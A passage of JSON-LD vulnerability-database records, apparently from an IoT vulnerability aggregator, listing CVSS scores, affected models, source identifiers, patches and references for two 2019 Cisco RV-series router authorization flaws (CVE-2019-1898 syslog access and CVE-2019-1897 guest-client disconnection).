                "availabilityImpact": "NONE",
                "baseScore": 5.3,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 3.9,
                "id": "CVE-2019-1898",
                "impactScore": 1.4,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
                "version": "3.1"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2019-1898",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2019-1898",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2019-1898",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2019-18901",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201906-796",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-151380",
                "trust": 0.1,
                "value": "MEDIUM"
              },
              {
                "author": "VULMON",
                "id": "CVE-2019-1898",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-18901"
          },
          {
            "db": "VULHUB",
            "id": "VHN-151380"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-1898"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005707"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-796"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1898"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1898"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A vulnerability in the web-based management interface of Cisco RV110W, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to access the syslog file on an affected device. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing the URL for the syslog file. A successful exploit could allow the attacker to access the information contained in the file. The Cisco\\302\\256 RV110W and so on are all VPN firewall routers from Cisco. \nSuccessfully exploiting this issue may allow an attacker to bypass certain security restrictions and perform unauthorized actions",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-1898"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005707"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-18901"
          },
          {
            "db": "BID",
            "id": "108865"
          },
          {
            "db": "VULHUB",
            "id": "VHN-151380"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-1898"
          }
        ],
        "trust": 2.61
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-1898",
            "trust": 3.5
          },
          {
            "db": "BID",
            "id": "108865",
            "trust": 2.1
          },
          {
            "db": "TENABLE",
            "id": "TRA-2019-29",
            "trust": 1.8
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2019.2190",
            "trust": 1.2
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005707",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-796",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-18901",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-151380",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-1898",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-18901"
          },
          {
            "db": "VULHUB",
            "id": "VHN-151380"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-1898"
          },
          {
            "db": "BID",
            "id": "108865"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005707"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-796"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1898"
          }
        ]
      },
      "id": "VAR-201906-0689",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-18901"
          },
          {
            "db": "VULHUB",
            "id": "VHN-151380"
          }
        ],
        "trust": 1.2914166040000001
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-18901"
          }
        ]
      },
      "last_update_date": "2024-11-23T22:06:10.379000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-20190619-rv-fileaccess",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190619-rv-fileaccess"
          },
          {
            "title": "Patch for CiscoRV110W, RV130W, and RV215W Authorization Issue Vulnerabilities",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/164675"
          },
          {
            "title": "Cisco RV110W , RV130W  and RV215W Remediation measures for authorization problem vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=93946"
          },
          {
            "title": "Cisco: Cisco RV110W, RV130W, and RV215W Routers Unauthenticated syslog File Access Vulnerability",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20190619-rv-fileaccess"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-18901"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-1898"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005707"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-796"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-285",
            "trust": 1.9
          },
          {
            "problemtype": "CWE-425",
            "trust": 1.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-151380"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005707"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1898"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.8,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190619-rv-fileaccess"
          },
          {
            "trust": 2.5,
            "url": "http://www.securityfocus.com/bid/108865"
          },
          {
            "trust": 1.8,
            "url": "https://www.tenable.com/security/research/tra-2019-29"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-1898"
          },
          {
            "trust": 1.2,
            "url": "https://www.auscert.org.au/bulletins/esb-2019.2190/"
          },
          {
            "trust": 0.9,
            "url": "http://www.cisco.com/"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-1898"
          },
          {
            "trust": 0.6,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190619-rv-dos"
          },
          {
            "trust": 0.6,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190619-rv-infodis"
          },
          {
            "trust": 0.6,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190619-rvrouters-dos"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/425.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-18901"
          },
          {
            "db": "VULHUB",
            "id": "VHN-151380"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-1898"
          },
          {
            "db": "BID",
            "id": "108865"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005707"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-796"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1898"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-18901"
          },
          {
            "db": "VULHUB",
            "id": "VHN-151380"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-1898"
          },
          {
            "db": "BID",
            "id": "108865"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005707"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-796"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1898"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-06-24T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-18901"
          },
          {
            "date": "2019-06-20T00:00:00",
            "db": "VULHUB",
            "id": "VHN-151380"
          },
          {
            "date": "2019-06-20T00:00:00",
            "db": "VULMON",
            "id": "CVE-2019-1898"
          },
          {
            "date": "2019-06-19T00:00:00",
            "db": "BID",
            "id": "108865"
          },
          {
            "date": "2019-06-26T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-005707"
          },
          {
            "date": "2019-06-20T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201906-796"
          },
          {
            "date": "2019-06-20T03:15:12.433000",
            "db": "NVD",
            "id": "CVE-2019-1898"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-06-24T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-18901"
          },
          {
            "date": "2020-10-16T00:00:00",
            "db": "VULHUB",
            "id": "VHN-151380"
          },
          {
            "date": "2020-10-16T00:00:00",
            "db": "VULMON",
            "id": "CVE-2019-1898"
          },
          {
            "date": "2019-06-19T00:00:00",
            "db": "BID",
            "id": "108865"
          },
          {
            "date": "2019-06-26T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-005707"
          },
          {
            "date": "2020-10-21T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201906-796"
          },
          {
            "date": "2024-11-21T04:37:38.620000",
            "db": "NVD",
            "id": "CVE-2019-1898"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-796"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural  Cisco Vulnerabilities related to authorization in routers",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005707"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "authorization issue",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-796"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201906-0688

    Vulnerability from variot - Updated: 2024-11-23 22:06

    A vulnerability in the web-based management interface of Cisco RV110W, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to disconnect clients that are connected to the guest network on an affected router. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing the URL for device disconnection and providing the connected device information. A successful exploit could allow the attacker to deny service to specific clients that are connected to the guest network. Cisco RV110W , RV130W , RV215W There is an authorization vulnerability in the router.Service operation interruption (DoS) There is a possibility of being put into a state. The Cisco\302\256 RV110W and so on are all VPN firewall routers from Cisco. The vulnerability stems from a program failing to properly authorize an HTTP request, which can be exploited by a remote attacker to cause a denial of service. An attacker can leverage this issue to cause denial of service condition. This issue is being tracked by Cisco Bug IDs CSCvo65045, CSCvo65048, CSCvo65050

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201906-0688",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv110w wireless-n vpn firewall",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w wireless-n multifunction vpn routerr",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv110w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "rv130w wireless-n multifunction vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "rv110w wireless-n vpn firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-18900"
          },
          {
            "db": "BID",
            "id": "108848"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005706"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1897"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv130w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005706"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Jacob Baines of Tenable, Inc. .",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-794"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2019-1897",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 5.0,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2019-1897",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 5.0,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2019-18900",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 5.0,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 10.0,
                "id": "VHN-151369",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "ykramarz@cisco.com",
                "availabilityImpact": "LOW",
                "baseScore": 5.3,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 3.9,
                "id": "CVE-2019-1897",
                "impactScore": 1.4,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
                "version": "3.0"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "LOW",
                "baseScore": 5.3,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 3.9,
                "id": "CVE-2019-1897",
                "impactScore": 1.4,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
                "version": "3.1"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2019-1897",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2019-1897",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2019-1897",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2019-18900",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201906-794",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-151369",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-18900"
          },
          {
            "db": "VULHUB",
            "id": "VHN-151369"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005706"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-794"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1897"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1897"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A vulnerability in the web-based management interface of Cisco RV110W, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to disconnect clients that are connected to the guest network on an affected router. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing the URL for device disconnection and providing the connected device information. A successful exploit could allow the attacker to deny service to specific clients that are connected to the guest network. Cisco RV110W , RV130W , RV215W There is an authorization vulnerability in the router.Service operation interruption (DoS) There is a possibility of being put into a state. The Cisco\\302\\256 RV110W and so on are all VPN firewall routers from Cisco. The vulnerability stems from a program failing to properly authorize an HTTP request, which can be exploited by a remote attacker to cause a denial of service. \nAn attacker can leverage this issue to cause denial of service condition. \nThis issue is being tracked by Cisco Bug IDs CSCvo65045, CSCvo65048, CSCvo65050",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-1897"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005706"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-18900"
          },
          {
            "db": "BID",
            "id": "108848"
          },
          {
            "db": "VULHUB",
            "id": "VHN-151369"
          }
        ],
        "trust": 2.52
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-1897",
            "trust": 3.4
          },
          {
            "db": "BID",
            "id": "108848",
            "trust": 2.0
          },
          {
            "db": "TENABLE",
            "id": "TRA-2019-29",
            "trust": 1.7
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2019.2190",
            "trust": 1.2
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005706",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-794",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-18900",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-151369",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-18900"
          },
          {
            "db": "VULHUB",
            "id": "VHN-151369"
          },
          {
            "db": "BID",
            "id": "108848"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005706"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-794"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1897"
          }
        ]
      },
      "id": "VAR-201906-0688",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-18900"
          },
          {
            "db": "VULHUB",
            "id": "VHN-151369"
          }
        ],
        "trust": 1.2914166040000001
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-18900"
          }
        ]
      },
      "last_update_date": "2024-11-23T22:06:10.343000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-20190619-rv-dos",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190619-rv-dos"
          },
          {
            "title": "Patch for Cisco RV110W, RV130W, and RV215W Licensing Issue Vulnerabilities (CNVD-2019-18900)",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/164677"
          },
          {
            "title": "Cisco RV110W , RV130W  and RV215W Remediation measures for authorization problem vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=93944"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-18900"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005706"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-794"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-285",
            "trust": 1.9
          },
          {
            "problemtype": "CWE-306",
            "trust": 1.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-151369"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005706"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1897"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.6,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190619-rv-dos"
          },
          {
            "trust": 2.3,
            "url": "http://www.securityfocus.com/bid/108848"
          },
          {
            "trust": 1.7,
            "url": "https://www.tenable.com/security/research/tra-2019-29"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-1897"
          },
          {
            "trust": 1.2,
            "url": "https://www.auscert.org.au/bulletins/esb-2019.2190/"
          },
          {
            "trust": 0.9,
            "url": "http://www.cisco.com/"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-1897"
          },
          {
            "trust": 0.6,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190619-rv-infodis"
          },
          {
            "trust": 0.6,
